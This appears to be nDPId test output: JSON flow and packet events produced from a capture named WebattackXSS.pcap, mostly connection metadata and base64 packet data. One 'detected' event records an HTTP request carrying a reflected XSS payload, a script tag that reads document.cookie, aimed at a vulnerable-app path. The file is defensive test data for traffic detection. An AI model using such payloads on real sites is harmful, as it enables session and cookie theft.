-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347417243,"flow_last_seen":1499347422731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347418519,"flow_last_seen":1499347423606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56980,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347418519,"flow_last_seen":1499347423606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347421069,"flow_last_seen":1499347426732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57008,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347421069,"flow_last_seen":1499347426732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57008,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347422332,"flow_last_seen":1499347427732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57022,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347422332,"flow_last_seen":1499347427732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57022,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347423604,"flow_last_seen":1499347428732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57036,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347423604,"flow_last_seen":1499347428732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":320,"flow_first_seen":1499347355229,"flow_last_seen":1499347423381,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232389,"flow_avg_l4_payload_len":726,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4839,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347547687,"flow_last_seen":1499347547687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347547687,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4839,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":1499347547687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347547687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89IlAAD4G0UasEAABwKgKMuP4AFDYf+rfAAAAAKACchCXygAAAgQFtAQCCAoBOx5WAAAAAAEDAwc="} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4840,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":2,"flow_last_seen":1499347547687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347547687,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4\/gRtWE22H\/q4KAScSAyDgAAAgQFtAQCCAoD5O\/LATseVgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4841,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":3,"flow_last_seen":1499347547688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347547688,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09IpAAD4G0U2sEAABwKgKMuP4AFDYf+rgEbVhN4AQAOXRFQAAAQEICgE7HlYD5O\/L"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4857,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347550209,"flow_last_seen":1499347550209,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347550209,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4857,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":1,"flow_last_seen":1499347550209,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347550209,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eyFAAD4GSq+sEAABwKgKMuQSAFDq3lvtAAAAAKACchARzgAAAgQFtAQCCAoBOyDMAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4858,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":2,"flow_last_seen":1499347550209,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347550209,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5BLEGGHa6t5b7qAScSD2kwAAAgQFtAQCCAoD5PJBATsgzAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4859,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":3,"flow_last_seen":1499347550210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347550210,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eyJAAD4GSrasEAABwKgKMuQSAFDq3lvuxBhh24AQAOWVmwAAAQEICgE7IMwD5PJB"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347551495,"flow_last_seen":1499347551495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347551495,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":1499347551495,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347551495,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D\/NAAD4Gtd2sEAABwKgKMuQgAFDTqC39AAAAAKACchBVpAAAAgQFtAQCCAoBOyIOAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":2,"flow_last_seen":1499347551496,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347551496,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5CCgVV5k06gt\/qAScSBgYQAAAgQFtAQCCAoD5PODATsiDgEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":3,"flow_last_seen":1499347551496,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347551496,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D\/RAAD4GteSsEAABwKgKMuQgAFDTqC3+oFVeZYAQAOX\/aAAAAQEICgE7Ig4D5POD"} -01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347547687,"flow_last_seen":1499347551497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347551497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27MRVS1VO9FLO4CFA5FLJ13I9GULOFH69WHOJQ0PH0OKE2FMG3MQ%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347552736,"flow_last_seen":1499347552736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347552736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":1499347552736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347552736,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8B91AAD4GvfOsEAABwKgKMuQuAFCEqySZAAAAAKACchCswQAAAgQFtAQCCAoBOyNEAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":2,"flow_last_seen":1499347552736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347552736,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5C6xPoYyhKskmqAScSB9kQAAAgQFtAQCCAoD5PS5ATsjRAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4887,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":3,"flow_last_seen":1499347552737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347552737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0B95AAD4GvfqsEAABwKgKMuQuAFCEqySasT6GM4AQAOUcmQAAAQEICgE7I0QD5PS5"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347555255,"flow_last_seen":1499347555255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347555255,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":1,"flow_last_seen":1499347555255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347555255,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81HxAAD4G8VOsEAABwKgKMuRIAFCgOPHGAAAAAKACchDBdgAAAgQFtAQCCAoBOyW6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4902,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":2,"flow_last_seen":1499347555255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347555255,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5EiyOWdGoDjxx6AScSCtwQAAAgQFtAQCCAoD5PcvATslugEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4903,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":3,"flow_last_seen":1499347555256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347555256,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01H1AAD4G8VqsEAABwKgKMuRIAFCgOPHHsjlnR4AQAOVMyQAAAQEICgE7JboD5Pcv"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4912,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347556523,"flow_last_seen":1499347556523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556523,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4912,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":1,"flow_last_seen":1499347556523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347556523,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89uZAAD4GzumsEAABwKgKMuRWAFDF1NARAAAAAKACchC8RAAAAgQFtAQCCAoBOyb3AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4913,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":2,"flow_last_seen":1499347556523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347556523,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5FYT\/QypxdTQEqAScSCgLAAAAgQFtAQCCAoD5PhsATsm9wEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":3,"flow_last_seen":1499347556524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347556524,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09udAAD4GzvCsEAABwKgKMuRWAFDF1NASE\/0MqoAQAOU\/NAAAAQEICgE7JvcD5Phs"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347426122,"flow_last_seen":1499347431733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57062,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347426122,"flow_last_seen":1499347431733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347427366,"flow_last_seen":1499347432733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57076,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347427366,"flow_last_seen":1499347432733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57076,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347428671,"flow_last_seen":1499347433734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57090,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347428671,"flow_last_seen":1499347433734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347431192,"flow_last_seen":1499347436733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57116,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347431192,"flow_last_seen":1499347436733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347432482,"flow_last_seen":1499347437734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57130,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347432482,"flow_last_seen":1499347437734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 